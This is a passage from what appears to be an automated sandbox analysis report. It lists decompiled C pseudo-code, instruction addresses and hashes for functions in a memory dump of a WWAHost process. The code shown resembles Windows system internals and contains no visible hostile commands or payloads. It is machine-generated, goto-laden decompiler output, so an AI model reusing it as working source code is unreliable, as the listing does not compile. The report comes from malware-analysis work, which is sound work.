						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3a47c04 != 0) {
						_t118 = _v12;
						_t120 = E039DA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3a47bd8;
						if( *0x3a47bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E039995D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E039999A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E039D3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0395B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0399AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3a48474 - 3;
										if( *0x3a48474 != 3) {
											 *0x3a479dc =  *0x3a479dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03977D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03977D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E039D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3a48708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3a47b00; // 0x0
							asm("ror esi, cl");
							 *0x3a4b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E039995D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03967F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                              0x039803f1
                                              0x039803f7
                                              0x039803f9
                                              0x039803fb
                                              0x039803fd
                                              0x03980400
                                              0x0398040a
                                              0x039c4c7a
                                              0x03980537
                                              0x03980547
                                              0x03980410
                                              0x03980410
                                              0x03980414
                                              0x03980417
                                              0x0398041a
                                              0x03980421
                                              0x03980424
                                              0x0398042b
                                              0x0398043b
                                              0x0398043e
                                              0x0398043f
                                              0x0398043f
                                              0x03980446
                                              0x03980449
                                              0x0398044c
                                              0x0398044f
                                              0x03980459
                                              0x039c4c8d
                                              0x0398045f
                                              0x0398045f
                                              0x0398045f
                                              0x03980467
                                              0x039c4c97
                                              0x039c4c9d
                                              0x039c4ca4
                                              0x039c4caa
                                              0x039c4caf
                                              0x039c4cb1
                                              0x039c4cc3
                                              0x039c4cb3
                                              0x039c4cbc
                                              0x039c4cbc
                                              0x039c4cc8
                                              0x039c4ccb
                                              0x039c4cd7
                                              0x039c4cda
                                              0x039c4cdf
                                              0x039c4cdf
                                              0x039c4ccb
                                              0x039c4ca4
                                              0x0398046d
                                              0x0398046f
                                              0x0398046f
                                              0x03980471
                                              0x03980476
                                              0x0398047a
                                              0x0398047b
                                              0x03980483
                                              0x03980489
                                              0x0398048d
                                              0x00000000
                                              0x00000000
                                              0x039c4ce9
                                              0x039c4cef
                                              0x039c4d22
                                              0x039c4d22
                                              0x00000000
                                              0x039c4d22
                                              0x039c4cf1
                                              0x039c4cf7
                                              0x00000000
                                              0x00000000
                                              0x039c4cf9
                                              0x039c4cff
                                              0x00000000
                                              0x00000000
                                              0x039c4d05
                                              0x039c4d07
                                              0x00000000
                                              0x00000000
                                              0x039c4d0d
                                              0x039c4d0f
                                              0x039c4d14
                                              0x039c4d16
                                              0x00000000
                                              0x00000000
                                              0x039c4d1c
                                              0x039c4d1c
                                              0x03980499
                                              0x03980535
                                              0x03980535
                                              0x00000000
                                              0x03980535
                                              0x039804a6
                                              0x039c4d2c
                                              0x039c4d37
                                              0x039c4d39
                                              0x039c4d3b
                                              0x00000000
                                              0x00000000
                                              0x039c4d41
                                              0x039c4d48
                                              0x03980527
                                              0x0398052b
                                              0x0398052d
                                              0x03980530
                                              0x03980530
                                              0x00000000
                                              0x0398052b
                                              0x039c4d4e
                                              0x039804ac
                                              0x039804ac
                                              0x039804af
                                              0x039804b2
                                              0x039804b7
                                              0x039804b9
                                              0x039804bb
                                              0x039804bd
                                              0x039804bf
                                              0x039804c5
                                              0x039804c9
                                              0x039c4d53
                                              0x039c4d59
                                              0x039c4db9
                                              0x039c4dba
                                              0x039c4dbf
                                              0x039c4dc2
                                              0x039c4dc4
                                              0x039c4dc7
                                              0x039c4dce
                                              0x00000000
                                              0x039c4dce
                                              0x039c4d5b
                                              0x039c4d61
                                              0x00000000
                                              0x00000000
                                              0x039c4d63
                                              0x039c4d69
                                              0x00000000
                                              0x00000000
                                              0x039c4d6b
                                              0x039c4d6e
                                              0x039c4d74
                                              0x039c4d76
                                              0x039c4d7c
                                              0x039c4d7e
                                              0x039c4d84
                                              0x039c4d89
                                              0x039c4d8c
                                              0x039c4d8d
                                              0x039c4d92
                                              0x039c4d95
                                              0x039c4d96
                                              0x039c4d98
                                              0x039c4d9a
                                              0x039c4d9f
                                              0x039c4da4
                                              0x039c4da6
                                              0x039c4da8
                                              0x039c4daf
                                              0x039c4db1
                                              0x039c4db1
                                              0x039c4daf
                                              0x039c4da6
                                              0x039c4d84
                                              0x039c4d7c
                                              0x00000000
                                              0x039c4d74
                                              0x039804d6
                                              0x039c4de1
                                              0x039804dc
                                              0x039804dc
                                              0x039804dc
                                              0x039804e4
                                              0x039c4deb
                                              0x039c4df1
                                              0x039c4df8
                                              0x039c4dfe
                                              0x039c4e03
                                              0x039c4e05
                                              0x039c4e17
                                              0x039c4e07
                                              0x039c4e10
                                              0x039c4e10
                                              0x039c4e1c
                                              0x039c4e1f
                                              0x039c4e35
                                              0x039c4e35
                                              0x039c4e1f
                                              0x039c4df8
                                              0x039804f1
                                              0x039804fa
                                              0x039c4e3f
                                              0x039c4e47
                                              0x039c4e5b
                                              0x039c4e61
                                              0x039c4e67
                                              0x039c4e69
                                              0x039c4e71
                                              0x039c4e73
                                              0x03980500
                                              0x03980500
                                              0x03980500
                                              0x039804fa
                                              0x03980508
                                              0x0398051d
                                              0x0398051d
                                              0x0398051f
                                              0x03980524
                                              0x00000000
                                              0x03980524
                                              0x03980515
                                              0x03980517
                                              0x039c4e7a
                                              0x039c4e7c
                                              0x00000000
                                              0x00000000
                                              0x039c4e85
                                              0x00000000
                                              0x039c4e85
                                              0x00000000
                                              0x03980517

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06ee2f568d1c443ae42660eff0b871fa4f172c0e3fea560f09b338acfa9a70f4
                                              • Instruction ID: 6e4f1885432418d7fc84d4fc2800674889d771c1c3c9e001e49a918ea409ceb0
                                              • Opcode Fuzzy Hash: 06ee2f568d1c443ae42660eff0b871fa4f172c0e3fea560f09b338acfa9a70f4
                                              • Instruction Fuzzy Hash: 4F913D35F40354AFEB22EB69C854BADBBA8EB81754F090265E911AB3D0E7749C04C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395C600 Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E0395C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x3a4d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03966D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0399B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3a47b9c; // 0x0
					_t74 = L03974620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03999650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L039777F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0399F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E039913C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L039777F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E03999650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                              0x0395c608
                                              0x0395c615
                                              0x0395c625
                                              0x0395c62d
                                              0x0395c635
                                              0x0395c640
                                              0x0395c680
                                              0x0395c687
                                              0x0395c688
                                              0x0395c689
                                              0x0395c694
                                              0x0395c694
                                              0x0395c642
                                              0x0395c64a
                                              0x0395c697
                                              0x039c7a25
                                              0x039c7a2b
                                              0x039c7a2e
                                              0x039c7a30
                                              0x039c7bea
                                              0x039c7bea
                                              0x00000000
                                              0x039c7bea
                                              0x039c7a36
                                              0x039c7a43
                                              0x039c7a48
                                              0x039c7a4c
                                              0x039c7a4e
                                              0x00000000
                                              0x00000000
                                              0x039c7a58
                                              0x039c7a5a
                                              0x039c7a5b
                                              0x039c7a5c
                                              0x039c7a5d
                                              0x039c7a63
                                              0x039c7a64
                                              0x039c7a6a
                                              0x039c7a6c
                                              0x039c7a6e
                                              0x039c79cb
                                              0x039c79cb
                                              0x039c79ce
                                              0x039c79d0
                                              0x039c7a98
                                              0x039c7a9b
                                              0x039c7a9b
                                              0x039c7a9e
                                              0x039c7aa1
                                              0x039c7bbe
                                              0x039c7bbe
                                              0x039c7bc0
                                              0x039c7be0
                                              0x039c7be0
                                              0x039c7a01
                                              0x039c7a01
                                              0x039c7a05
                                              0x039c7a07
                                              0x039c7a15
                                              0x039c7a15
                                              0x039c7a1a
                                              0x00000000
                                              0x039c7a1a
                                              0x039c7bc2
                                              0x039c7bc6
                                              0x039c7bc9
                                              0x039c7bcd
                                              0x039c7bcf
                                              0x039c79e6
                                              0x039c79e6
                                              0x039c79eb
                                              0x039c79eb
                                              0x039c79ef
                                              0x039c79f1
                                              0x00000000
                                              0x00000000
                                              0x039c79f3
                                              0x039c79f5
                                              0x039c79ff
                                              0x039c79ff
                                              0x00000000
                                              0x039c79ff
                                              0x039c79f7
                                              0x039c79fd
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039c79fd
                                              0x039c7bd5
                                              0x039c7bd8
                                              0x00000000
                                              0x00000000
                                              0x039c7ba9
                                              0x039c7bac
                                              0x039c7bb0
                                              0x039c7bb1
                                              0x039c7bb1
                                              0x039c7bb6
                                              0x00000000
                                              0x039c7bb6
                                              0x039c7aa7
                                              0x039c7aaa
                                              0x00000000
                                              0x00000000
                                              0x039c7ab2
                                              0x039c7ab3
                                              0x039c7ab5
                                              0x039c7aec
                                              0x039c7aef
                                              0x039c7b25
                                              0x039c7b28
                                              0x039c7b62
                                              0x039c7b64
                                              0x039c7b8f
                                              0x039c7b92
                                              0x039c7b96
                                              0x039c7b98
                                              0x00000000
                                              0x00000000
                                              0x039c7b9e
                                              0x039c7b9f
                                              0x039c7ba3
                                              0x00000000
                                              0x039c7ba3
                                              0x039c7b66
                                              0x039c7b68
                                              0x039c7ae2
                                              0x039c7ae2
                                              0x00000000
                                              0x039c7ae2
                                              0x039c7b6e
                                              0x039c7b72
                                              0x039c7b75
                                              0x039c7b81
                                              0x039c7b85
                                              0x039c7b87
                                              0x00000000
                                              0x00000000
                                              0x039c7b31
                                              0x039c7b34
                                              0x039c7b3c
                                              0x039c7b45
                                              0x039c7b46
                                              0x039c7b4f
                                              0x039c7b51
                                              0x039c7b57
                                              0x039c7b59
                                              0x039c7b59
                                              0x00000000
                                              0x039c7b59
                                              0x039c7b77
                                              0x00000000
                                              0x039c7b77
                                              0x039c7b2a
                                              0x00000000
                                              0x039c7b2a
                                              0x039c7af1
                                              0x039c7af3
                                              0x00000000
                                              0x00000000
                                              0x039c7afb
                                              0x039c7afc
                                              0x039c7afe
                                              0x00000000
                                              0x00000000
                                              0x039c7b00
                                              0x039c7b03
                                              0x00000000
                                              0x00000000
                                              0x039c7b05
                                              0x039c7b09
                                              0x039c7b0d
                                              0x039c7b0f
                                              0x00000000
                                              0x00000000
                                              0x039c7b18
                                              0x039c7b1d
                                              0x00000000
                                              0x039c7b1d
                                              0x039c7ab7
                                              0x039c7ab9
                                              0x00000000
                                              0x00000000
                                              0x039c7abf
                                              0x039c7ac1
                                              0x00000000
                                              0x00000000
                                              0x039c7ac3
                                              0x039c7ac6
                                              0x00000000
                                              0x00000000
                                              0x039c7ac8
                                              0x039c7acc
                                              0x039c7ad0
                                              0x039c7ad2
                                              0x00000000
                                              0x00000000
                                              0x039c7adb
                                              0x00000000
                                              0x039c7adb
                                              0x039c79d6
                                              0x039c79d9
                                              0x039c79dc
                                              0x039c7a91
                                              0x039c7a94
                                              0x00000000
                                              0x039c7a94
                                              0x039c79e2
                                              0x00000000
                                              0x039c79e2
                                              0x039c7a74
                                              0x039c7a7a
                                              0x00000000
                                              0x00000000
                                              0x039c7a8a
                                              0x039c7a21
                                              0x039c7a21
                                              0x00000000
                                              0x039c7a21
                                              0x0395c650
                                              0x0395c651
                                              0x0395c656
                                              0x0395c65c
                                              0x0395c65d
                                              0x0395c663
                                              0x0395c664
                                              0x0395c66a
                                              0x0395c66e
                                              0x039c79c5
                                              0x039c79c7
                                              0x00000000
                                              0x039c79c7
                                              0x0395c67a
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d721c4453d7c79040ca94678c48355198adaba511c1dc09aeff607331d8afbaf
                                              • Instruction ID: e02f97a32f6b2b2f522c240cacdef1e0f758f23120346fda8db67faefc9d2747
                                              • Opcode Fuzzy Hash: d721c4453d7c79040ca94678c48355198adaba511c1dc09aeff607331d8afbaf
                                              • Instruction Fuzzy Hash: 9B816F756243829FDB25CE94C880A7AB7ADEB842D4F18486EED469B240D331DD41CFA3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039EB8D0 Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 39%
                                              			E039EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3a47b9c; // 0x0
				_t124 = L03974620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03999800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E039995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E039995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L039777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03999910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E039995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3a47b9c; // 0x0
									_t92 = L03974620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03999910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0395A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E039EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E039EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E039995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                              0x039eb8d9
                                              0x039eb8e4
                                              0x00000000
                                              0x039eb8e6
                                              0x039eb8f3
                                              0x039eb8f5
                                              0x039eb8f5
                                              0x039eb8f8
                                              0x039eb920
                                              0x039eb924
                                              0x039eb936
                                              0x039eb939
                                              0x039eb93d
                                              0x039eb948
                                              0x039eb9a0
                                              0x039eb9a0
                                              0x039eb9a4
                                              0x039eb9bf
                                              0x039eb9c4
                                              0x039eb9c6
                                              0x039eb9cd
                                              0x039eb9d1
                                              0x039ebad4
                                              0x039ebad8
                                              0x039ebada
                                              0x039ebadc
                                              0x039ebadc
                                              0x039ebadf
                                              0x039ebae0
                                              0x039ebae2
                                              0x039ebae4
                                              0x039ebaec
                                              0x039ebaee
                                              0x039ebaf0
                                              0x039ebaf0
                                              0x039ebaec
                                              0x039ebafb
                                              0x039ebafc
                                              0x039ebafe
                                              0x039ebb01
                                              0x039ebb01
                                              0x00000000
                                              0x039ebb06
                                              0x039eb9d7
                                              0x039eb9db
                                              0x039eb9db
                                              0x039eb9de
                                              0x039eb9de
                                              0x039eb9e4
                                              0x039eb9e7
                                              0x039eb9ea
                                              0x039eb9ec
                                              0x039eb9ef
                                              0x039eb9f3
                                              0x039eba1b
                                              0x039eba1b
                                              0x039eba23
                                              0x039eba24
                                              0x039eba27
                                              0x039eba2a
                                              0x039eba2b
                                              0x039eba2e
                                              0x039eba30
                                              0x039eba37
                                              0x039eba3f
                                              0x039eba9c
                                              0x039ebaa2
                                              0x039ebb13
                                              0x039ebb15
                                              0x039ebaae
                                              0x039ebaae
                                              0x039ebab3
                                              0x039ebab5
                                              0x039ebaba
                                              0x039ebac8
                                              0x039ebac8
                                              0x039ebaba
                                              0x039ebacd
                                              0x039ebacf
                                              0x00000000
                                              0x039ebacf
                                              0x039ebb1a
                                              0x00000000
                                              0x039ebb1c
                                              0x039ebaa7
                                              0x039ebb11
                                              0x00000000
                                              0x039ebb11
                                              0x039ebaa9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039eba41
                                              0x039eba41
                                              0x039eba41
                                              0x039eba58
                                              0x039eba5d
                                              0x039eba62
                                              0x00000000
                                              0x00000000
                                              0x039eba64
                                              0x039eba67
                                              0x039eba68
                                              0x039eba69
                                              0x039eba6c
                                              0x039eba6f
                                              0x039eba71
                                              0x039eba78
                                              0x039eba80
                                              0x00000000
                                              0x00000000
                                              0x039eba90
                                              0x039eba90
                                              0x039eba97
                                              0x00000000
                                              0x039eba97
                                              0x039eb9f5
                                              0x039eb9f7
                                              0x039eb9f7
                                              0x039eb9fa
                                              0x039eba03
                                              0x039eba07
                                              0x039eba0c
                                              0x039eba10
                                              0x039eba17
                                              0x00000000
                                              0x039eb9f7
                                              0x039eb9a6
                                              0x039eb9a8
                                              0x039eb9af
                                              0x039eb9b3
                                              0x00000000
                                              0x00000000
                                              0x039eb9b9
                                              0x00000000
                                              0x039eb9b9
                                              0x039eb94d
                                              0x039eb98f
                                              0x039eb995
                                              0x039eb999
